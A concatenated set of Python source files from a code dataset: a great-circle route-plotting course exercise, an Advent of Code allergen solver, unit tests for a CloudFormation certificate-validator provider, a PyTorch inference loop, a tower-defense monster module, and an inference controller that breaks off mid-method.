+{"seq_id":"251899494","text":"# Use the formats from the course video \"Ejemplo - Gráfica de ciudades colombianas\" as a reference. \n\n#Write a Python program that:\n\n#1. Has a function called lee_datos whose first\n#argument is the string representing the name of the\n#file with the coordinates (in the same format as the video) and whose\n#second argument is the string representing the name of\n#the file with the city names. The function must return\n#two numpy arrays: the first array corresponds to the coordinates and\n#the second to the city names. \n\n#2. Has a function called genera_recorrido. This function\n#takes as input argument an array of city names. The\n#function generates a random list of n+1 integers whose first and\n#last elements are the number 0. n is the length of the array of\n#city names. The remaining elements of the list must include, in\n#shuffled order, the numbers from 1 to n-1. In this list the integer n\n#represents the n-th city in the input array. This list of\n#integers therefore represents a route that starts and ends\n#at the first city of the list and passes through all the cities. The\n#function must return the list of n+1 integers. \n\n#3. Has a function called calcula_distancia. This function\n#takes as first input argument an array of coordinates of\n#cities, as second argument an integer a, and as third argument\n#an integer b. The integers represent the rows of the\n#coordinate array. The function must compute the distance between the two\n#cities represented by the two integers a and b, given the\n#input coordinates. The function must return the value of the\n#distance. Compute this distance assuming the Earth is a\n#perfect sphere of radius 6400 km and that the measurement is taken over\n#the arc of minimum length on that\n#sphere https://www.johndcook.com/lat_long_details.html \n
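# A quick numerical sanity check of the point-3 formula (added illustration; the\n# city coordinates below are approximate and not part of the assignment): with\n# phi the colatitude (90 - latitude) and theta the longitude, both in radians,\n#     d = R * arccos(sin(phi_a)*sin(phi_b)*cos(theta_a - theta_b) + cos(phi_a)*cos(phi_b))\n# For Bogota (4.61 N, 74.08 W) and Medellin (6.24 N, 75.58 W) with R = 6400 km\n# this gives on the order of 240 km, which matches the known separation.\n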
\n#4. Has a function called calcula_distancia_total. This\n#function takes as first input argument an array of coordinates\n#of cities and as second argument a list with at least two\n#integers. The integers represent the rows of the coordinate\n#array. The function must compute the total distance of the\n#route represented by the input list of integers. The function\n#must return the total distance. \n\n#5. Has a function called encuentra_recorrido. The\n#function takes as first argument the name of the file with\n#city coordinates and as second argument the name of the\n#file with the city names. The function uses the\n#functions of the four previous points to generate 100 different\n#routes through the cities of the input files. Out of those 100\n#routes it finds the route of smallest total length and\n#plots it in a Longitude-Latitude plane where each city is\n#represented by a point and its name. The pairs of cities that\n#are connected in the route are represented by a straight line\n#in the Longitude-Latitude plane. The plot must be saved as\n#\"recorrido_mas_corto.png\". The function returns None. \n\n#You may use numpy's shuffle function\n#(https://docs.scipy.org/doc/numpy-1.15.0/reference/generated/numpy.random.shuffle.html) \n#Only the functions and methods that appear in the\n#videos seen so far in the course are allowed.  \n\n#The program must be in a file called\n#\"ApellidoNombre_Ejercicio04.py\" where Apellido and Nombre must be\n#replaced with your last and first name. The file must only\n#include the necessary imports and the requested functions. Upload that\n#file as the answer to this activity. \n\n#Running \"python ApellidoNombre_Ejercicio04.py\" must not\n#produce any error, nothing must be printed on screen and\n#no file must be created by the program. \n\n#To grade the exercise we are going to call the function\n#encuentra_recorrido with two file names and contents\n#different from those of the video. Those files contain the data of at\n#least four cities. 
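# Hedged usage sketch (the file names below are hypothetical, not given by the\n# assignment): assuming 'coordenadas.txt' holds one 'lat,lon' pair per line and\n# 'ciudades.txt' one city name per line, the grader would simply call\n#\n#     encuentra_recorrido('coordenadas.txt', 'ciudades.txt')\n#\n# which writes 'recorrido_mas_corto.png' and returns None.\n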
\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef lee_datos(archivo_coordenadas, archivo_nombres):\n coordenadas = np.loadtxt(archivo_coordenadas, delimiter=\",\")\n nombres = np.loadtxt(archivo_nombres, dtype=\"str\")\n return coordenadas, nombres\n\ndef genera_recorrido(nombres):\n n = len(nombres)\n r = np.arange(n-1)+1\n np.random.shuffle(r)\n r = [0] + list(r) + [0]\n return r\n\ndef calcula_distancia(coordenadas, a, b):\n latitud = coordenadas[:,0]\n longitud = coordenadas[:,1]\n\n phi = 90.0 - latitud\n theta = longitud\n theta[longitud<0] = 360.0 + longitud[longitud<0]\n\n phi = phi * np.pi/180.0\n theta = theta * np.pi/180.0\n\n psi = np.sin(phi[a])*np.sin(phi[b]) * np.cos(theta[a]-theta[b])\n psi = psi + np.cos(phi[a]) * np.cos(phi[b])\n psi = np.arccos(psi)\n rho = 6400.0\n return rho*psi\n\ndef calcula_distancia_total(coordenadas, recorrido):\n d = 0\n for i in range(len(recorrido)-1):\n d += calcula_distancia(coordenadas, recorrido[i], recorrido[i+1])\n return d\n\ndef encuentra_recorrido(archivo_coordenadas, archivo_nombres):\n coordenadas, nombres = lee_datos(archivo_coordenadas, archivo_nombres)\n\n d_min = 1E10\n r_min = []\n for i in range(100):\n r = genera_recorrido(nombres)\n d = calcula_distancia_total(coordenadas, r)\n if d < d_min:\n d_min = d\n r_min = r.copy()\n\n plt.figure()\n n_ciudades = len(nombres)\n for i in range(n_ciudades):\n plt.text(coordenadas[i,1], coordenadas[i,0], nombres[i])\n\n plt.scatter(coordenadas[r_min,1], coordenadas[r_min,0])\n plt.plot(coordenadas[r_min,1], coordenadas[r_min,0])\n\n plt.xlabel(\"Longitud [grados]\")\n plt.ylabel(\"Latitud [grados]\")\n plt.axis('equal')\n plt.savefig(\"recorrido_mas_corto.png\")\n\n return None\n\n","sub_path":"soluciones/ejercicio_04.py","file_name":"ejercicio_04.py","file_ext":"py","file_size_in_byte":5936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"461057084","text":"from collections import OrderedDict\n\ndef main():\n f = open('21-input.txt', 'r')\n lines = f.read().split('\\n')[:-1]\n f.close()\n\n foods = []\n allergens = []\n for line in lines:\n foods.append((line.split(' (')[0].split(' '), line.split('contains ')[1][:-1].split(', ')))\n allergens.extend(line.split('contains ')[1][:-1].split(', '))\n \n allergens = remove_duplicates(allergens)\n\n possibles = {}\n for allergen in allergens:\n allergen_foods = []\n ingredients = []\n for food in foods:\n if allergen in food[1]:\n allergen_foods.append(food[0])\n ingredients.extend(food[0])\n ingredients = remove_duplicates(ingredients)\n \n matching = []\n for ingredient in ingredients:\n failed = False\n for allergen_food in allergen_foods:\n if ingredient not in allergen_food:\n failed = True\n break\n if not failed:\n matching.append(ingredient)\n \n possibles[allergen] = matching\n\n finals = {}\n while len(finals) < len(possibles):\n for allergen, ingredients in possibles.items():\n if len(ingredients) == 1:\n finals[allergen] = ingredients[0]\n for key in possibles.keys():\n if key == allergen:\n continue\n if ingredients[0] in possibles[key]:\n possibles[key].remove(ingredients[0])\n\n bad = []\n ordered_finals = OrderedDict(sorted(finals.items()))\n for key, value in ordered_finals.items():\n bad.append(value)\n result = ','.join(bad)\n\n print('Result:', result)\n\ndef remove_duplicates(_list):\n temp = []\n for i in _list:\n if i not in temp:\n temp.append(i)\n return temp\n\nif __name__ == '__main__':\n main()\n\n# Result: \n","sub_path":"Day 
21/21-2.py","file_name":"21-2.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645004712","text":"# -*- coding: utf-8 -*-\n\"\"\"Tests for the `provider` module.\"\"\"\n\nfrom unittest.mock import patch\n\nfrom certificate_validator.provider import (\n Provider, Request, RequestResourceProperties, RequestType, Response,\n Status\n)\n\nfrom .base import (\n BaseTestCase, ProviderBaseTestCase, RequestBaseTestCase,\n ResponseBaseTestCase\n)\n\n\nclass RequestTypeTestCase(BaseTestCase):\n def setUp(self):\n super(RequestTypeTestCase, self).setUp()\n\n def test_class(self):\n self.assertEqual('Create', RequestType.CREATE.value)\n self.assertEqual('Update', RequestType.UPDATE.value)\n self.assertEqual('Delete', RequestType.DELETE.value)\n\n\nclass StatusTestCase(BaseTestCase):\n def setUp(self):\n super(StatusTestCase, self).setUp()\n\n def test_class(self):\n self.assertEqual('SUCCESS', Status.SUCCESS.value)\n self.assertEqual('FAILED', Status.FAILED.value)\n\n\nclass RequestTestCase(RequestBaseTestCase):\n def setUp(self):\n super(RequestTestCase, self).setUp()\n\n def test_init(self):\n kwargs = {'a': 1, 'b': 2, 'c': 3}\n r = Request(**kwargs)\n self.assertEqual(1, r.a)\n self.assertEqual(2, r.b)\n self.assertEqual(3, r.c)\n self.assertEqual(Request.DEFAULT_REGION, r.region)\n\n def test_request_type(self):\n self.assertEqual('request_type', self.request.request_type)\n\n def test_service_token(self):\n self.assertEqual('service_token', self.request.service_token)\n\n def test_response_url(self):\n self.assertEqual('response_url', self.request.response_url)\n\n def test_stack_id(self):\n self.assertEqual('stack_id', self.request.stack_id)\n\n def test_request_id(self):\n self.assertEqual('request_id', self.request.request_id)\n\n def test_resource_type(self):\n self.assertEqual('resource_type', self.request.resource_type)\n\n def test_logical_resource_id(self):\n self.assertEqual(\n 'logical_resource_id', self.request.logical_resource_id\n )\n\n def test_physical_resource_id(self):\n self.assertEqual(\n 'physical_resource_id', self.request.physical_resource_id\n )\n kwargs = {}\n r = Request(**kwargs)\n self.assertEqual('', r.physical_resource_id)\n\n def test_resource_properties(self):\n self.assertEqual(\n 'service_token', self.request.resource_properties.service_token\n )\n\n def test_resource_properties_none(self):\n r = Request(ResourceProperties=None)\n properties = r.resource_properties\n self.assertIsInstance(properties, RequestResourceProperties)\n # TODO\n\n def test_old_resource_properties(self):\n self.assertEqual(\n 'service_token', self.request.old_resource_properties.service_token\n )\n\n def test_old_resource_properties_none(self):\n r = Request(OldResourceProperties=None)\n properties = r.old_resource_properties\n self.assertIsInstance(properties, RequestResourceProperties)\n # TODO\n\n def test_sans(self):\n kwargs = {\n 'ResourceProperties': {\n 'SubjectAlternativeNames': ['www.certificate-validator.com']\n }\n }\n r = Request(**kwargs)\n self.assertEqual(['www.certificate-validator.com'],\n r.resource_properties.sans)\n\n def test_old_sans(self):\n kwargs = {\n 'OldResourceProperties': {\n 'SubjectAlternativeNames': ['www.certificate-validator.com']\n }\n }\n r = Request(**kwargs)\n properties = r.resource_properties\n old_properties = r.old_resource_properties\n self.assertEqual([], properties.sans)\n self.assertEqual(['www.certificate-validator.com'],\n 
old_properties.sans)\n\n def test_sans_with_empty_only(self):\n self.assertEqual([], self.request.resource_properties.sans)\n for case in [None, [''], [None], ['', None], [None, '']]:\n kwargs = {'ResourceProperties': {'SubjectAlternativeNames': case}}\n r = Request(**kwargs)\n properties = r.resource_properties\n self.assertEqual([], properties.sans,\n \"Failed test. input %s, expected %s, got %s\" %\n (case, [], properties.sans))\n\n def test_sans_with_mixed(self):\n for case in [['', 'www.certificate-validator.com'],\n [None, 'www.certificate-validator.com'],\n ['www.certificate-validator.com', None],\n ['', 'www.certificate-validator.com', None],\n [None, '', 'www.certificate-validator.com']]:\n kwargs = {'ResourceProperties': {'SubjectAlternativeNames': case}}\n r = Request(**kwargs)\n properties = r.resource_properties\n sans = properties.sans\n self.assertEqual(['www.certificate-validator.com'], sans,\n \"Failed test. input %s, expected %s, got %s\" %\n (case, ['www.certificate-validator.com'], sans))\n\n def test_region_default(self):\n self.assertEqual(Request.DEFAULT_REGION, self.request.region)\n\n def test_region_caching(self):\n region = self.request.region\n self.mock_logger.warning.assert_called_with(\n \"Failed to parse stack ARN(%s) to get region - defaulting to %s\",\n 'stack_id', Request.DEFAULT_REGION\n )\n self.mock_logger.reset_mock()\n region2 = self.request.region\n self.mock_logger.warning.assert_not_called()\n self.assertIs(region, region2)\n self.assertEqual(Request.DEFAULT_REGION, self.request.region)\n\n def test_region_from_arn(self):\n for region in ['us-west-1', 'us-east-1', 'us-west-2', 'ap-south-1']:\n kwargs = {\n \"StackId\":\n \"arn:aws:cloudformation:{}:{}:stack/stackname/guid\".format(\n region, '123456789012'\n )\n }\n r = Request(**kwargs)\n actual = r.region\n self.assertEqual(\n region, actual, \"Expected %s, got %s\" % (region, actual)\n )\n\n\nclass ResponseTestCase(ResponseBaseTestCase):\n def setUp(self):\n super(ResponseTestCase, self).setUp()\n\n def test_init(self):\n kwargs = {'a': 1, 'b': 2, 'c': 3}\n r = Response(**kwargs)\n self.assertEqual(1, r.a)\n self.assertEqual(2, r.b)\n self.assertEqual(3, r.c)\n r = Response(\n request_id='request_id',\n stack_id='stack_id',\n logical_resource_id='logical_resource_id'\n )\n self.assertEqual('request_id', r.request_id)\n self.assertEqual('stack_id', r.stack_id)\n self.assertEqual('logical_resource_id', r.logical_resource_id)\n self.assertEqual('', r.physical_resource_id)\n r = Response(\n request_id='request_id',\n stack_id='stack_id',\n logical_resource_id='logical_resource_id',\n physical_resource_id='physical_resource_id'\n )\n self.assertEqual('request_id', r.request_id)\n self.assertEqual('stack_id', r.stack_id)\n self.assertEqual('logical_resource_id', r.logical_resource_id)\n self.assertEqual('physical_resource_id', r.physical_resource_id)\n\n def test_status(self):\n self.assertEqual('status', self.response.status)\n\n def test_reason(self):\n self.assertEqual('reason', self.response.reason)\n\n def test_stack_id(self):\n self.assertEqual('stack_id', self.response.stack_id)\n\n def test_request_id(self):\n self.assertEqual('request_id', self.response.request_id)\n\n def test_logical_resource_id(self):\n self.assertEqual(\n 'logical_resource_id', self.response.logical_resource_id\n )\n\n def test_physical_resource_id(self):\n self.assertEqual(\n 'physical_resource_id', self.response.physical_resource_id\n )\n\n def test_no_echo(self):\n self.assertEqual(True, self.response.no_echo)\n\n def 
test_data(self):\n self.assertEqual({'a': 1, 'b': 2, 'c': 3}, self.response.data)\n\n def test_set_status(self):\n self.response.set_status(True)\n self.assertEqual('SUCCESS', self.response.status)\n self.response.set_status(False)\n self.assertEqual('FAILED', self.response.status)\n\n def test_set_reason(self):\n self.response.set_reason('')\n self.assertEqual('', self.response.reason)\n\n def test_set_physical_resource_id(self):\n self.response.set_physical_resource_id('1337')\n self.assertEqual('1337', self.response.physical_resource_id)\n\n def test_set_data(self):\n self.response.set_data({'a': 1, 'b': 2, 'c': 3})\n self.assertEqual({'a': 1, 'b': 2, 'c': 3}, self.response.data)\n kwargs = {}\n r = Response(**kwargs)\n r.set_data({'a': 1, 'b': 2, 'c': 3})\n self.assertEqual({'a': 1, 'b': 2, 'c': 3}, r.data)\n\n def test_dict(self):\n self.kwargs = self.response.dict()\n\n\nclass ProviderTestCase(ProviderBaseTestCase):\n def setUp(self):\n super(ProviderTestCase, self).setUp()\n\n def test_init(self):\n self.assertEqual(self.provider.request, self.request)\n self.assertEqual(self.provider.response, self.response)\n\n def test_set_response(self):\n r = Response()\n self.provider._set_response(r)\n self.assertEqual(r, self.provider.response)\n\n def test_create(self):\n with self.assertRaises(NotImplementedError):\n self.provider.create()\n\n def test_update(self):\n with self.assertRaises(NotImplementedError):\n self.provider.update()\n\n def test_delete(self):\n with self.assertRaises(NotImplementedError):\n self.provider.delete()\n\n def test_handler_create(self):\n self.mock_create = patch.object(Provider, 'create').start()\n self.mock_send_response = patch.object(Provider,\n 'send_response').start()\n self.request_kwargs['RequestType'] = 'Create'\n request = Request(**self.request_kwargs)\n provider = Provider(request, self.response)\n provider.handler()\n self.mock_create.assert_called_once()\n self.mock_send_response.assert_called_once()\n\n def test_handler_update(self):\n self.mock_update = patch.object(Provider, 'update').start()\n self.mock_send_response = patch.object(Provider,\n 'send_response').start()\n self.request_kwargs['RequestType'] = 'Update'\n request = Request(**self.request_kwargs)\n provider = Provider(request, self.response)\n provider.handler()\n self.mock_update.assert_called_once()\n self.mock_send_response.assert_called_once()\n\n def test_handler_delete(self):\n self.mock_delete = patch.object(Provider, 'delete').start()\n self.mock_send_response = patch.object(Provider,\n 'send_response').start()\n self.request_kwargs['RequestType'] = 'Delete'\n request = Request(**self.request_kwargs)\n provider = Provider(request, self.response)\n provider.handler()\n self.mock_delete.assert_called_once()\n self.mock_send_response.assert_called_once()\n\n def test_handler_unknown(self):\n self.mock_send_response = patch.object(Provider,\n 'send_response').start()\n self.request_kwargs['RequestType'] = 'Unknown'\n request = Request(**self.request_kwargs)\n provider = Provider(request, self.response)\n provider.handler()\n self.assertEqual('FAILED', self.provider.response.status)\n self.assertEqual(\n 'Unknown RequestType: Must be one of: Create, Update, or Delete.',\n self.provider.response.reason\n )\n self.mock_send_response.assert_called_once()\n\n def test_send_response(self):\n self.provider.send_response()\n self.mock_requests.put.assert_called_with(\n 'response_url',\n json=self.provider.response.dict(),\n headers={'Content-Type': ''}\n 
)\n","sub_path":"certificate_validator/tests/test_provider.py","file_name":"test_provider.py","file_ext":"py","file_size_in_byte":12291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"497804475","text":"from torch.autograd import Variable\nimport numpy as np\nimport os\nimport sys\ncurrent_dir = os.path.dirname(os.path.abspath(\"__file__\"))\nsys.path.append( str(current_dir) + '/../../../' )\n\nfrom setting_param import prediction_num_of_node_max_new as max_new\nfrom setting_param import prediction_num_of_node_min_new as min_new\nfrom setting_param import prediction_num_of_node_max_lost as max_lost\nfrom setting_param import prediction_num_of_node_min_lost as min_lost\n\ndef inference(dataloader, net, criterion, opt, OutputDir, node_type):\n net.eval()\n for i, (sample_idx, input_new, input_lost, label_new, label_lost) in enumerate(dataloader, 0):\n\n if opt.cuda:\n input_new = input_new.cuda()\n input_lost = input_lost.cuda()\n label_new = label_new.cuda()\n label_lost = label_lost.cuda()\n\n if node_type == \"new\":\n input = Variable(input_new).double()\n target = Variable(label_new).double()\n max_ = max_new\n min_ = min_new\n elif node_type == \"lost\":\n input = Variable(input_lost).double()\n target = Variable(label_lost).double()\n max_ = max_lost\n min_ = min_lost\n\n output = net(input)\n\n # 予測結果とラベルを保存\n os.makedirs(OutputDir + \"/output\", exist_ok=True)\n for batch in range(opt.batchSize):\n np.save(OutputDir + \"/output/pred\" + str(sample_idx.numpy()[batch]), output.detach().numpy()[batch] * (max_ - min_) + min_)\n np.save(OutputDir + \"/output/true\" + str(sample_idx.numpy()[batch]), target[batch].numpy() * (max_ - min_) + min_)\n","sub_path":"Model/prediction_num_of_node/LSTM/utils/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327047118","text":"from collections import deque\r\n#import sympy.geometry as g\r\nimport Geometry as geo\r\n\r\nMAX_MONSTER_SPEED = 21\r\nMIN_MONSTER_SPEED = 21\r\n\r\n\r\nclass MonsterWay: # todo normal point now tuple with pairs x y\r\n def __init__(self):\r\n self.way = ((1, 1), (2, 1), (3, 1), (4, 1), (5, 1), (6, 1), (7, 1), (8, 1), (9, 1), (10, 1), (11, 1),\r\n (12, 1), (13, 1), (14, 1), (15, 1), (16, 1), (17, 1), (18, 1), (18, 2), (18, 3), (18, 4),\r\n (18, 5), (18, 6), (18, 7), (18, 8), (18, 9), (18, 10), (17, 10), (16, 10), (15, 10), (14, 10),\r\n (13, 10), (12, 10), (11, 10), (10, 10), (9, 10), (8, 10), (7, 10), (6, 10), (5, 9), (4, 8),\r\n (3, 8), (2, 8), (1, 8), (0, 8), (0, 9), (0, 10), (0, 11), (0, 12), (0, 13), (0, 14), (0, 15),\r\n (0, 16), (0, 17), (1, 18), (2, 20), (2, 21), (3, 22), (4, 23), (5, 24), (6, 25), (7, 26), (8, 27),\r\n (9, 28), (10, 29), (11, 30), (12, 31), (13, 32), (14, 33), (15, 34), (16, 35), (17, 35), (18, 35),\r\n (19, 35), (20, 35), (21, 35), (22, 35), (23, 35), (24, 35), (25, 35), (25, 35), (26, 35),\r\n (27, 35), (28, 35), (29, 35), (30, 35), (31, 35), (32, 35), (33, 35), (34, 35), (35, 35), (36, 35),\r\n (37, 35), (38, 35), (39, 35), (40, 35), (41, 35), (42, 35), (42, 35), (43, 35), (44, 35), (45, 35),\r\n (46, 35), (47, 35), (48, 35), (49, 35), (50, 35), (51, 34), (52, 33), (53, 32), (54, 31), (55, 30),\r\n (56, 29), (57, 28), (58, 27), (59, 26), (60, 25), (61, 25)\r\n )\r\n self.lobby = 2\r\n self.city = len(self.way) - 2\r\n\r\n def in_lobby(self, index):\r\n return index < self.lobby\r\n\r\n def in_city(self, 
index):\r\n return index > self.city\r\n\r\n def x(self, index):\r\n return self.way[index][0] # todo this safety with processing\r\n\r\n def y(self, index):\r\n return self.way[index][1]\r\n\r\n\r\nclass MonsterWave:\r\n def __init__(self, world, monster_amount, monster_time_interval):\r\n self.monster_way = MonsterWay()\r\n self.monsters_lobby = deque(Monster(world, self, -5, -5) for _ in range(0, monster_amount))\r\n self.monster_time_interval = monster_time_interval\r\n self.monsters_on_map = [] # deque()\r\n self.world = world\r\n self.alive = True\r\n\r\n self.health_on_map = 0\r\n self.monster_wave_health = len(self.monsters_lobby) * 20 + self.health_on_map\r\n\r\n def add_on_map(self):\r\n if self.monsters_lobby and self.world.draw_system.draw_tick % self.monster_time_interval == 0:\r\n self.monsters_on_map.append(self.monsters_lobby.popleft())\r\n\r\n def refresh_on_map(self):\r\n for monster in self.monsters_on_map:\r\n if not monster.alive:\r\n if monster.monster_loot:\r\n self.world.player.monsters_loots.append(monster.monster_loot)\r\n monster.monster_loot = None\r\n self.monsters_on_map.remove(monster)\r\n monster.refresh()\r\n self.health_on_map += max(int(monster.health), 0)\r\n self.monster_wave_health = len(self.monsters_lobby) * 20 + self.health_on_map\r\n self.health_on_map = 0\r\n self.world.player.wave_health = self.monster_wave_health\r\n\r\n def refresh(self):\r\n self.add_on_map()\r\n self.refresh_on_map()\r\n if not (self.monsters_lobby or self.monsters_on_map):\r\n self.alive = False\r\n\r\n\r\nclass MonsterArmor:\r\n def __init__(self, monster, monster_armor):\r\n self.froze = monster_armor[\"Froze\"]\r\n self.fire = monster_armor[\"Fire\"]\r\n self.poison = monster_armor[\"Poison\"]\r\n self.electricity = monster_armor[\"Electricity\"]\r\n self.physical = monster_armor[\"Physical\"]\r\n self.monster = monster\r\n\r\n\r\nclass MonsterLoot:\r\n def __init__(self, monster):\r\n self.monster = monster\r\n self.money = 10\r\n self.citizen_annihilation = 1\r\n self.experience = 5\r\n self.in_city = False\r\n self.available = True\r\n\r\n\r\nclass MonsterEffects:\r\n def __init__(self, monster):\r\n self.froze = 0\r\n self.fire = 0\r\n self.poison = 0\r\n self.electricity = 0\r\n self.slowing = 5\r\n self.direction = 1\r\n self.towers_attacks = []\r\n self.damage = 0\r\n self.monster = monster\r\n\r\n def _effects_collecting(self):\r\n for tower_attack in self.towers_attacks:\r\n electricity = tower_attack.electricity_attack - self.monster.armor.electricity\r\n poison = tower_attack.poison_attack - self.monster.armor.poison\r\n fire = tower_attack.fire_attack - self.monster.armor.fire\r\n froze = tower_attack.froze_attack - self.monster.armor.fire\r\n damage = tower_attack.physical_attack - self.monster.armor.physical\r\n self.slowing += tower_attack.slowing_change\r\n self.direction = tower_attack.direction_change\r\n self.electricity += max(electricity, 0)\r\n self.poison += max(poison, 0)\r\n self.froze += max(froze, 0)\r\n self.fire += max(fire, 0)\r\n self.damage += max(damage, 0)\r\n self.towers_attacks = []\r\n\r\n def _effects_calculation(self):\r\n effcoff = {\"electricity\": self.electricity, \"froze\": self.froze, \"poison\": self.poison, \"fire\": self.fire}\r\n elecoff = {\"electricity\": 0, \"froze\": 0.33, \"poison\": -0.17, \"fire\": -0.13}\r\n fircoff = {\"electricity\": 0.46, \"froze\": -1, \"poison\": 0.08, \"fire\": 0}\r\n frocoff = {\"electricity\": 0.193, \"froze\": 0, \"poison\": 0, \"fire\": -1}\r\n poicoff = {\"electricity\": -0.17, \"froze\": 
-0.37, \"poison\": 0, \"fire\": -0.3}\r\n slocoff = {\"electricity\": -0.33, \"froze\": 0.83, \"poison\": 0, \"fire\": -0.43}\r\n dmgcoff = {\"electricity\": 0.76, \"froze\": 0.56, \"poison\": 0.86, \"fire\": 0.63}\r\n electricity = sum(map(lambda x, y: x * y, effcoff.values(), elecoff.values()))\r\n fire = sum(map(lambda x, y: x * y, effcoff.values(), fircoff.values()))\r\n froze = sum(map(lambda x, y: x * y, effcoff.values(), frocoff.values()))\r\n poison = sum(map(lambda x, y: x * y, effcoff.values(), poicoff.values()))\r\n slowing = sum(map(lambda x, y: x * y, effcoff.values(), slocoff.values()))\r\n self.slowing += slowing\r\n self.electricity = max(self.electricity + electricity, 0)\r\n self.poison = max(self.poison + poison, 0)\r\n self.froze = max(self.froze + froze, 0)\r\n self.fire = max(self.fire + fire, 0)\r\n effcoff = {\"electricity\": self.electricity, \"froze\": self.froze, \"poison\": self.poison, \"fire\": self.fire}\r\n damage = sum(map(lambda x, y: x * y, effcoff.values(), dmgcoff.values()))\r\n self.damage += damage\r\n\r\n def _tick_effects_update(self):\r\n self.damage = 0\r\n self.poison *= 0.88\r\n self.froze *= 0.67\r\n self.fire *= 0.44\r\n self.electricity *= 0.2\r\n self.slowing *= 0.76\r\n if self.monster.world.draw_system.draw_tick % 200 == 0:\r\n self.direction = 1\r\n else:\r\n self.direction = self.direction\r\n\r\n def refresh_effects(self):\r\n self._effects_collecting()\r\n self._effects_calculation()\r\n self.monster.health -= self.damage\r\n\r\n self.monster.speed_now = self.monster.speed_base - int(self.slowing + 0.5) # TODO make armotization for this\r\n self._tick_effects_update()\r\n\r\n\r\nclass Monster:\r\n def __init__(self, world, wave, x, y):\r\n self.world = world\r\n self.wave = wave\r\n self.x = x\r\n self.y = y\r\n self.width = 2\r\n self.height = 2\r\n self.polygon = self._init_polygon()\r\n self._speed_base = None\r\n self._speed_now = None\r\n self.speed_base = 5\r\n self.speed_now = self._speed_base\r\n self.health = 20\r\n self.monster_loot = MonsterLoot(self)\r\n self.lived_ticks = 0\r\n self.alive = True\r\n self.armor = MonsterArmor(self, {\"Froze\": 0, \"Fire\": 0, \"Poison\": 0, \"Electricity\": 0, \"Physical\": 0})\r\n self.texture = \"M\"\r\n self.effects = MonsterEffects(self)\r\n self.type = \"all\"\r\n self.ai_points = 0\r\n self.way_position = 0\r\n self.monster_way = wave.monster_way\r\n self.step = 1\r\n # in future it resizing objects configure\r\n\r\n @property\r\n def speed_base(self):\r\n return self._speed_base\r\n\r\n @speed_base.setter\r\n def speed_base(self, speed_base):\r\n self._speed_base = max(-MIN_MONSTER_SPEED, min(speed_base, MAX_MONSTER_SPEED - 1))\r\n\r\n @property\r\n def speed_now(self):\r\n return self._speed_now\r\n\r\n @speed_now.setter\r\n def speed_now(self, speed_now):\r\n self._speed_now = min(MIN_MONSTER_SPEED + MAX_MONSTER_SPEED - 2, max(MAX_MONSTER_SPEED - speed_now, 1))\r\n\r\n def is_can_be_attacked(self, typeof):\r\n return typeof in (\"all\", self.type) and self.alive\r\n\r\n def _init_polygon(self):\r\n x = self.x\r\n y = self.y\r\n w = self.width - 1\r\n h = self.height - 1\r\n return geo.Rectangle(x,y,w,h)#//g.polygon.Polygon(g.Point(x, y), g.Point(x + w, y), g.Point(x + w, y + h), g.Point(x, y + h))\r\n\r\n def refresh(self):\r\n if not self.alive:\r\n return\r\n self.polygon = self._init_polygon()\r\n self.effects.refresh_effects()\r\n self.lived_ticks += 1\r\n self.lived_ticks %= 100\r\n self.refresh_ai()\r\n if self.health < 1:\r\n self.alive = False\r\n self.x = -1\r\n self.y = 
-1\r\n\r\n def refresh_ai(self):\r\n if self.monster_way.in_city(self.way_position):\r\n self.monster_loot.in_city = True\r\n self.effects.Direction = 0\r\n self.alive = False\r\n if self.world.draw_system.draw_tick % self.speed_now == 0:\r\n self.lived_ticks += 1\r\n self.lived_ticks %= 100\r\n if self.monster_way.in_lobby(self.way_position):\r\n self.effects.Direction = 1\r\n self.move()\r\n\r\n def _movement(self, x, y):\r\n if self.alive:\r\n self.x += x\r\n self.y += y\r\n\r\n def move(self):\r\n self.way_position += self.step * self.effects.direction\r\n self.x = self.monster_way.x(self.way_position)\r\n self.y = self.monster_way.y(self.way_position)\r\n\r\n def in_screen(self, window_width, window_height):\r\n return 0 <= self.x <= window_width + self.width and 0 <= self.y <= window_height + self.height and self.alive\r\n\r\n def effect_on_tick(self):\r\n pass\r\n","sub_path":"Monsters.py","file_name":"Monsters.py","file_ext":"py","file_size_in_byte":10604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"42124548","text":"import sys\nsys.path.append('../')\nfrom utilities.utils import ModelUtils\nfrom logger.logger import Logger\nfrom db_operations.sqlite_db import SqliteDbHandler\nfrom utilities.utils import FileUtils\nimport os\nfrom joblib import dump, load\nfrom datetime import datetime\nimport more_itertools\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\n\n\n\nclass Inference_Controller:\n def __init__(self,inference_db_path,preprocessor):\n self._inference_db_path = inference_db_path\n self._time_created = datetime.now()\n self._logger = Logger(f'inferencing_logs_{self._time_created.date()}_{self._time_created.strftime(\"%H%M%S\")}.log')\n self._db_handler = SqliteDbHandler(self._logger,self._inference_db_path,'inferencing_db')\n self._model_utils = ModelUtils(self._logger)\n self._preprocessor = preprocessor\n\n def _load_data(self):\n self._logger.log('Inference: Started Inferencing')\n self._logger.log('Inference: Loading data for Inferencing')\n try: \n self._db_handler.create_db_connection()\n df = self._db_handler.get_data_from_db('thyroid_inferencing')\n return df\n except Exception as e:\n self._logger.log(f'Inference: Exception occured while Loading data for Inferencing, {str(e)}')\n\n def _cluster_data(self,df):\n\n clustering_model_name_with_extension = self._all_models[0]\n model_name_only = clustering_model_name_with_extension.split('.')[0]\n clustering_model = self._model_utils.load_model(model_name_only)\n \n clusters = clustering_model.predict(df)\n df['clusters']=clusters\n self._clusters=df['clusters'].unique()\n\n return df\n \n def _get_model_for_clusters(self):\n \n model_repository = {}\n for cluster in self._clusters:\n model_repository[cluster]=self._model_utils.find_model_for_cluster(cluster)\n \n return model_repository\n\n def _get_label_encoder(self):\n return self._preprocessor.label_encoder\n\n def _make_predictions_for_clusters(self,df):\n\n label_encoder = self._get_label_encoder()\n all_models = self._get_model_for_clusters()\n\n final_predictions = pd.DataFrame()\n for cluster in self._clusters:\n current_cluster_data = 